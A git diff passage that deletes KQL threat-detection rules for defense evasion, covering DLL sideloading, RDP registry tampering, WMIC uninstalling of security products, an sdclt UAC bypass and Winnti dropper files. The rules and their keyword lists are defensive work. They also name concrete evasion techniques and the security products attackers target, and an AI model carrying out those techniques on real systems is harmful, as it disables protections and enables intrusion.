FolderPath endswith "\\eappprxy.dll" or FolderPath endswith "\\edputil.dll" or FolderPath endswith "\\efsadu.dll" or FolderPath endswith "\\efsutil.dll" or FolderPath endswith "\\esent.dll" or FolderPath endswith "\\execmodelproxy.dll" or FolderPath endswith "\\explorerframe.dll" or FolderPath endswith "\\fastprox.dll" or FolderPath endswith "\\faultrep.dll" or FolderPath endswith "\\fddevquery.dll" or FolderPath endswith "\\feclient.dll" or FolderPath endswith "\\fhcfg.dll" or FolderPath endswith "\\firewallapi.dll" or FolderPath endswith "\\flightsettings.dll" or FolderPath endswith "\\fltlib.dll" or FolderPath endswith "\\fveapi.dll" or FolderPath endswith "\\fwbase.dll" or FolderPath endswith "\\fwcfg.dll" or FolderPath endswith "\\fwpolicyiomgr.dll" or FolderPath endswith "\\fwpuclnt.dll" or FolderPath endswith "\\getuname.dll" or FolderPath endswith "\\hid.dll" or FolderPath endswith "\\hnetmon.dll" or FolderPath endswith "\\httpapi.dll" or FolderPath endswith "\\idstore.dll" or FolderPath endswith "\\ieadvpack.dll" or FolderPath endswith "\\iedkcs32.dll" or FolderPath endswith "\\iernonce.dll" or FolderPath endswith "\\iertutil.dll" or FolderPath endswith "\\ifmon.dll" or FolderPath endswith "\\iphlpapi.dll" or FolderPath endswith "\\iri.dll" or FolderPath endswith "\\iscsidsc.dll" or FolderPath endswith "\\iscsium.dll" or FolderPath endswith "\\isv.exe_rsaenh.dll" or FolderPath endswith "\\joinutil.dll" or FolderPath endswith "\\ksuser.dll" or FolderPath endswith "\\ktmw32.dll" or FolderPath endswith "\\licensemanagerapi.dll" or FolderPath endswith "\\licensingdiagspp.dll" or FolderPath endswith "\\linkinfo.dll" or FolderPath endswith "\\loadperf.dll" or FolderPath endswith "\\logoncli.dll" or FolderPath endswith "\\logoncontroller.dll" or FolderPath endswith "\\lpksetupproxyserv.dll" or FolderPath endswith "\\magnification.dll" or FolderPath endswith "\\mapistub.dll" or FolderPath endswith "\\mfcore.dll" or FolderPath endswith "\\mfplat.dll" or FolderPath 
endswith "\\mi.dll" or FolderPath endswith "\\midimap.dll" or FolderPath endswith "\\miutils.dll" or FolderPath endswith "\\mlang.dll" or FolderPath endswith "\\mmdevapi.dll" or FolderPath endswith "\\mobilenetworking.dll" or FolderPath endswith "\\mpr.dll" or FolderPath endswith "\\mprapi.dll" or FolderPath endswith "\\mrmcorer.dll" or FolderPath endswith "\\msacm32.dll" or FolderPath endswith "\\mscms.dll" or FolderPath endswith "\\mscoree.dll" or FolderPath endswith "\\msctf.dll" or FolderPath endswith "\\msctfmonitor.dll" or FolderPath endswith "\\msdrm.dll" or FolderPath endswith "\\msftedit.dll" or FolderPath endswith "\\msi.dll" or FolderPath endswith "\\msutb.dll" or FolderPath endswith "\\mswb7.dll" or FolderPath endswith "\\mswsock.dll" or FolderPath endswith "\\msxml3.dll" or FolderPath endswith "\\mtxclu.dll" or FolderPath endswith "\\napinsp.dll" or FolderPath endswith "\\ncrypt.dll" or FolderPath endswith "\\ndfapi.dll" or FolderPath endswith "\\netid.dll" or FolderPath endswith "\\netiohlp.dll" or FolderPath endswith "\\netplwiz.dll" or FolderPath endswith "\\netprofm.dll" or FolderPath endswith "\\netsetupapi.dll" or FolderPath endswith "\\netshell.dll" or FolderPath endswith "\\netutils.dll" or FolderPath endswith "\\networkexplorer.dll" or FolderPath endswith "\\newdev.dll" or FolderPath endswith "\\ninput.dll" or FolderPath endswith "\\nlaapi.dll" or FolderPath endswith "\\nlansp_c.dll" or FolderPath endswith "\\npmproxy.dll" or FolderPath endswith "\\nshhttp.dll" or FolderPath endswith "\\nshipsec.dll" or FolderPath endswith "\\nshwfp.dll" or FolderPath endswith "\\ntdsapi.dll" or FolderPath endswith "\\ntlanman.dll" or FolderPath endswith "\\ntlmshared.dll" or FolderPath endswith "\\ntmarta.dll" or FolderPath endswith "\\ntshrui.dll" or FolderPath endswith "\\oleacc.dll" or FolderPath endswith "\\omadmapi.dll" or FolderPath endswith "\\onex.dll" or FolderPath endswith "\\osbaseln.dll" or FolderPath endswith "\\osuninst.dll" or FolderPath 
endswith "\\p2p.dll" or FolderPath endswith "\\p2pnetsh.dll" or FolderPath endswith "\\p9np.dll" or FolderPath endswith "\\pcaui.dll" or FolderPath endswith "\\pdh.dll" or FolderPath endswith "\\peerdistsh.dll" or FolderPath endswith "\\pla.dll" or FolderPath endswith "\\pnrpnsp.dll" or FolderPath endswith "\\policymanager.dll" or FolderPath endswith "\\polstore.dll" or FolderPath endswith "\\printui.dll" or FolderPath endswith "\\propsys.dll" or FolderPath endswith "\\prvdmofcomp.dll" or FolderPath endswith "\\puiapi.dll" or FolderPath endswith "\\radcui.dll" or FolderPath endswith "\\rasapi32.dll" or FolderPath endswith "\\rasgcw.dll" or FolderPath endswith "\\rasman.dll" or FolderPath endswith "\\rasmontr.dll" or FolderPath endswith "\\reagent.dll" or FolderPath endswith "\\regapi.dll" or FolderPath endswith "\\resutils.dll" or FolderPath endswith "\\rmclient.dll" or FolderPath endswith "\\rpcnsh.dll" or FolderPath endswith "\\rsaenh.dll" or FolderPath endswith "\\rtutils.dll" or FolderPath endswith "\\rtworkq.dll" or FolderPath endswith "\\samcli.dll" or FolderPath endswith "\\samlib.dll" or FolderPath endswith "\\sapi_onecore.dll" or FolderPath endswith "\\sas.dll" or FolderPath endswith "\\scansetting.dll" or FolderPath endswith "\\scecli.dll" or FolderPath endswith "\\schedcli.dll" or FolderPath endswith "\\secur32.dll" or FolderPath endswith "\\shell32.dll" or FolderPath endswith "\\slc.dll" or FolderPath endswith "\\snmpapi.dll" or FolderPath endswith "\\spp.dll" or FolderPath endswith "\\sppc.dll" or FolderPath endswith "\\srclient.dll" or FolderPath endswith "\\srpapi.dll" or FolderPath endswith "\\srvcli.dll" or FolderPath endswith "\\ssp.exe_rsaenh.dll" or FolderPath endswith "\\ssp_isv.exe_rsaenh.dll" or FolderPath endswith "\\sspicli.dll" or FolderPath endswith "\\ssshim.dll" or FolderPath endswith "\\staterepository.core.dll" or FolderPath endswith "\\structuredquery.dll" or FolderPath endswith "\\sxshared.dll" or FolderPath endswith "\\tapi32.dll" 
or FolderPath endswith "\\tbs.dll" or FolderPath endswith "\\tdh.dll" or FolderPath endswith "\\tquery.dll" or FolderPath endswith "\\tsworkspace.dll" or FolderPath endswith "\\ttdrecord.dll" or FolderPath endswith "\\twext.dll" or FolderPath endswith "\\twinapi.dll" or FolderPath endswith "\\twinui.appcore.dll" or FolderPath endswith "\\uianimation.dll" or FolderPath endswith "\\uiautomationcore.dll" or FolderPath endswith "\\uireng.dll" or FolderPath endswith "\\uiribbon.dll" or FolderPath endswith "\\updatepolicy.dll" or FolderPath endswith "\\userenv.dll" or FolderPath endswith "\\utildll.dll" or FolderPath endswith "\\uxinit.dll" or FolderPath endswith "\\uxtheme.dll" or FolderPath endswith "\\vaultcli.dll" or FolderPath endswith "\\virtdisk.dll" or FolderPath endswith "\\vssapi.dll" or FolderPath endswith "\\vsstrace.dll" or FolderPath endswith "\\wbemprox.dll" or FolderPath endswith "\\wbemsvc.dll" or FolderPath endswith "\\wcmapi.dll" or FolderPath endswith "\\wcnnetsh.dll" or FolderPath endswith "\\wdi.dll" or FolderPath endswith "\\wdscore.dll" or FolderPath endswith "\\webservices.dll" or FolderPath endswith "\\wecapi.dll" or FolderPath endswith "\\wer.dll" or FolderPath endswith "\\wevtapi.dll" or FolderPath endswith "\\whhelper.dll" or FolderPath endswith "\\wimgapi.dll" or FolderPath endswith "\\winbrand.dll" or FolderPath endswith "\\windows.storage.dll" or FolderPath endswith "\\windows.storage.search.dll" or FolderPath endswith "\\windowscodecs.dll" or FolderPath endswith "\\windowscodecsext.dll" or FolderPath endswith "\\windowsudk.shellcommon.dll" or FolderPath endswith "\\winhttp.dll" or FolderPath endswith "\\wininet.dll" or FolderPath endswith "\\winipsec.dll" or FolderPath endswith "\\winmde.dll" or FolderPath endswith "\\winmm.dll" or FolderPath endswith "\\winnsi.dll" or FolderPath endswith "\\winrnr.dll" or FolderPath endswith "\\winsqlite3.dll" or FolderPath endswith "\\winsta.dll" or FolderPath endswith "\\wkscli.dll" or FolderPath 
endswith "\\wlanapi.dll" or FolderPath endswith "\\wlancfg.dll" or FolderPath endswith "\\wldp.dll" or FolderPath endswith "\\wlidprov.dll" or FolderPath endswith "\\wmiclnt.dll" or FolderPath endswith "\\wmidcom.dll" or FolderPath endswith "\\wmiutils.dll" or FolderPath endswith "\\wmsgapi.dll" or FolderPath endswith "\\wofutil.dll" or FolderPath endswith "\\wpdshext.dll" or FolderPath endswith "\\wshbth.dll" or FolderPath endswith "\\wshelper.dll" or FolderPath endswith "\\wtsapi32.dll" or FolderPath endswith "\\wwapi.dll" or FolderPath endswith "\\xmllite.dll" or FolderPath endswith "\\xolehlp.dll" or FolderPath endswith "\\xwizards.dll" or FolderPath endswith "\\xwtpw32.dll" or FolderPath endswith "\\aclui.dll" or FolderPath endswith "\\bderepair.dll" or FolderPath endswith "\\bootmenuux.dll" or FolderPath endswith "\\dcntel.dll" or FolderPath endswith "\\dwmcore.dll" or FolderPath endswith "\\dynamoapi.dll" or FolderPath endswith "\\fhsvcctl.dll" or FolderPath endswith "\\fxsst.dll" or FolderPath endswith "\\inproclogger.dll" or FolderPath endswith "\\iumbase.dll" or FolderPath endswith "\\kdstub.dll" or FolderPath endswith "\\maintenanceui.dll" or FolderPath endswith "\\mdmdiagnostics.dll" or FolderPath endswith "\\mintdh.dll" or FolderPath endswith "\\msdtctm.dll" or FolderPath endswith "\\nettrace.dll" or FolderPath endswith "\\osksupport.dll" or FolderPath endswith "\\reseteng.dll" or FolderPath endswith "\\resetengine.dll" or FolderPath endswith "\\spectrumsyncclient.dll" or FolderPath endswith "\\srcore.dll" or FolderPath endswith "\\systemsettingsthresholdadminflowui.dll" or FolderPath endswith "\\timesync.dll" or FolderPath endswith "\\upshared.dll" or FolderPath endswith "\\wmpdui.dll" or FolderPath endswith "\\wwancfg.dll" or FolderPath endswith "\\dpx.dll" or FolderPath endswith "\\fxsapi.dll" or FolderPath endswith "\\fxstiff.dll" or FolderPath endswith "\\xpsservices.dll" or FolderPath endswith "\\appvpolicy.dll" or FolderPath endswith 
"\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or 
FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains 
"C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql b/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
deleted file mode 100644
index 6cbd83b0..00000000
--- a/Defense Evasion/Potential_Tampering_With_RDP_Related_Registry_Keys_Via_Reg.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport
-// Date: 2022/02/12
-// Level: high
-// Description: Detects the execution of "reg.exe" for enabling/disabling the RDP service on the host by tampering with the 'CurrentControlSet\Control\Terminal Server' values
-// Tags: attack.defense_evasion, attack.lateral_movement, attack.t1021.001, attack.t1112
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\CurrentControlSet\\Control\\Terminal Server" and ProcessCommandLine contains "REG_DWORD" and ProcessCommandLine contains " /f") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) and ((ProcessCommandLine contains "Licensing Core" and ProcessCommandLine contains "EnableConcurrentSessions") or (ProcessCommandLine contains "WinStations\\RDP-Tcp" or ProcessCommandLine contains "MaxInstanceCount" or ProcessCommandLine contains "fEnableWinStation" or ProcessCommandLine contains "TSUserEnabled" or ProcessCommandLine contains "TSEnabled" or ProcessCommandLine contains "TSAppCompat" or ProcessCommandLine contains "IdleWinStationPoolCount" or ProcessCommandLine contains "TSAdvertise" or ProcessCommandLine contains "AllowTSConnections" or ProcessCommandLine contains "fSingleSessionPerUser" or ProcessCommandLine contains "fDenyTSConnections"))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql b/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql
deleted file mode 100644
index b51227cf..00000000
--- a/Defense Evasion/Potential_Tampering_With_Security_Products_Via_WMIC.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
-// Date: 2021/01/30
-// Level: high
-// Description: Detects uninstallation or termination of security products using the WMIC utility
-// Tags: attack.defense_evasion, attack.t1562.001
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "wmic" and ProcessCommandLine contains "product where " and ProcessCommandLine contains "call" and ProcessCommandLine contains "uninstall" and ProcessCommandLine contains "/nointeractive") or ((ProcessCommandLine contains "call delete" or ProcessCommandLine contains "call terminate") and (ProcessCommandLine contains "wmic" and ProcessCommandLine contains "caption like ")) or (ProcessCommandLine contains "process " and ProcessCommandLine contains "where " and ProcessCommandLine contains "delete")) and (ProcessCommandLine contains "%carbon%" or ProcessCommandLine contains "%cylance%" or ProcessCommandLine contains "%endpoint%" or ProcessCommandLine contains "%eset%" or ProcessCommandLine contains "%malware%" or ProcessCommandLine contains "%Sophos%" or ProcessCommandLine contains "%symantec%" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "AVG " or ProcessCommandLine contains "Carbon Black" or ProcessCommandLine contains "CarbonBlack" or ProcessCommandLine contains "Cb Defense Sensor 64-bit" or ProcessCommandLine contains "Crowdstrike Sensor" or ProcessCommandLine contains "Cylance " or ProcessCommandLine contains "Dell Threat Defense" or ProcessCommandLine contains "DLP Endpoint" or ProcessCommandLine contains "Endpoint Detection" or ProcessCommandLine contains "Endpoint Protection" or ProcessCommandLine contains "Endpoint Security" or ProcessCommandLine contains "Endpoint Sensor" or ProcessCommandLine contains "ESET File Security" or ProcessCommandLine contains "LogRhythm System Monitor Service" or ProcessCommandLine contains "Malwarebytes" or ProcessCommandLine contains "McAfee Agent" or
ProcessCommandLine contains "Microsoft Security Client" or ProcessCommandLine contains "Sophos Anti-Virus" or ProcessCommandLine contains "Sophos AutoUpdate" or ProcessCommandLine contains "Sophos Credential Store" or ProcessCommandLine contains "Sophos Management Console" or ProcessCommandLine contains "Sophos Management Database" or ProcessCommandLine contains "Sophos Management Server" or ProcessCommandLine contains "Sophos Remote Management System" or ProcessCommandLine contains "Sophos Update Manager" or ProcessCommandLine contains "Threat Protection" or ProcessCommandLine contains "VirusScan" or ProcessCommandLine contains "Webroot SecureAnywhere" or ProcessCommandLine contains "Windows Defender")
\ No newline at end of file
diff --git a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql b/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
deleted file mode 100644
index cb5229ea..00000000
--- a/Defense Evasion/Potential_UAC_Bypass_Via_Sdclt.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: medium
-// Description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.
-// Tags: attack.privilege_escalation, attack.defense_evasion, attack.t1548.002
-DeviceProcessEvents
-| where FolderPath endswith "sdclt.exe" and ProcessIntegrityLevel =~ "High"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql b/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql
deleted file mode 100644
index da809f2c..00000000
--- a/Defense Evasion/Potential_Vivaldi_elf.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/08/03
-// Level: medium
-// Description: Detects potential DLL sideloading of "vivaldi_elf.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\vivaldi_elf.dll" and (not((FolderPath contains "\\Vivaldi\\Application\\" and InitiatingProcessFolderPath endswith "\\Vivaldi\\Application\\vivaldi.exe")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql b/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql
deleted file mode 100644
index 4753e096..00000000
--- a/Defense Evasion/Potential_WWlib.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/05/18
-// Level: medium
-// Description: Detects potential DLL sideloading of "wwlib.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wwlib.dll" and (not(((FolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or FolderPath startswith "C:\\Program Files\\Microsoft Office\\") and InitiatingProcessFolderPath endswith "\\winword.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft Office\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft Office\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql b/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql
deleted file mode 100644
index 77fc4544..00000000
--- a/Defense Evasion/Potential_Waveedit.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/14
-// Level: high
-// Description: Detects potential DLL sideloading of "waveedit.dll", which is part of the Nero WaveEditor audio editing software.
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\waveedit.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe", "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\waveedit.exe")) and (FolderPath startswith "C:\\Program Files (x86)\\Nero\\Nero Apps\\Nero WaveEditor\\" or FolderPath startswith "C:\\Program Files\\Nero\\Nero Apps\\Nero WaveEditor\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
deleted file mode 100644
index 224f54fb..00000000
--- a/Defense Evasion/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql b/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql
deleted file mode 100644
index 91f57b60..00000000
--- a/Defense Evasion/Potential_WerFault_ReflectDebugger_Registry_Value_Abuse.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior
-// Date: 2023/05/18
-// Level: high
-// Description: Detects potential WerFault "ReflectDebugger" registry value abuse for persistence.
-// Tags: attack.defense_evasion, attack.t1036.003
-DeviceRegistryEvents
-| where ActionType =~ "RegistryValueSet" and RegistryKey endswith "\\Microsoft\\Windows\\Windows Error Reporting\\Hangs\\ReflectDebugger"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql b/Defense Evasion/Potential_Winnti_Dropper_Activity.kql
deleted file mode 100644
index fd24affe..00000000
--- a/Defense Evasion/Potential_Winnti_Dropper_Activity.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Alexander Rausch
-// Date: 2020/06/24
-// Level: high
-// Description: Detects files dropped by Winnti as described in RedMimicry Winnti playbook
-// Tags: attack.defense_evasion, attack.t1027
-DeviceFileEvents
-| where FolderPath endswith "\\gthread-3.6.dll" or FolderPath endswith "\\sigcmm-2.4.dll" or FolderPath endswith "\\Windows\\Temp\\tmp.bat"
\ No newline at end of file
diff --git a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql b/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql
deleted file mode 100644
index fa40db7c..00000000
--- a/Defense Evasion/Potential_appverifUI.DLL_Sideloading.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/06/20
-// Level: high
-// Description: Detects potential DLL sideloading of "appverifUI.dll"
-// Tags: attack.defense_evasion, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\appverifUI.dll" and (not(((InitiatingProcessFolderPath in~ ("C:\\Windows\\SysWOW64\\appverif.exe", "C:\\Windows\\System32\\appverif.exe")) and (FolderPath startswith "C:\\Windows\\System32\\" or FolderPath startswith "C:\\Windows\\SysWOW64\\" or FolderPath startswith "C:\\Windows\\WinSxS\\"))))
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql b/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql
deleted file mode 100644
index 3695de47..00000000
--- a/Defense Evasion/Potentially_Over_Permissive_Permissions_Granted_Using_Dsacls.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects usage of Dsacls to grant over permissive permissions
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
-| where ProcessCommandLine contains " /G " and (FolderPath endswith "\\dsacls.exe" or ProcessVersionInfoOriginalFileName =~ "DSACLS.EXE") and (ProcessCommandLine contains "GR" or ProcessCommandLine contains "GE" or ProcessCommandLine contains "GW" or ProcessCommandLine contains "GA" or ProcessCommandLine contains "WP" or ProcessCommandLine contains "WD")
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql b/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql
deleted file mode 100644
index 0c07adec..00000000
--- a/Defense Evasion/Potentially_Suspicious_ASP.NET_Compilation_Via_AspNetCompiler.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/08/14
-// Level: high
-// Description: Detects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
-// Tags: attack.defense_evasion, attack.t1127
-DeviceProcessEvents
-| where (ProcessCommandLine contains "\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Local\\Roaming\\" or ProcessCommandLine contains ":\\Temp\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains ":\\Windows\\System32\\Tasks\\" or ProcessCommandLine contains ":\\Windows\\Tasks\\") and (FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework\\" or FolderPath contains "C:\\Windows\\Microsoft.NET\\Framework64\\") and FolderPath endswith "\\aspnet_compiler.exe"
\ No newline at end of file
diff --git a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql b/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql
deleted file mode 100644
index cb8fcc62..00000000
--- a/Defense Evasion/Potentially_Suspicious_CMD_Shell_Output_Redirect.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/12
-// Level: medium
-// Description: Detects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location.
-This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
-
-// Tags: attack.defense_evasion, attack.t1218
-DeviceProcessEvents
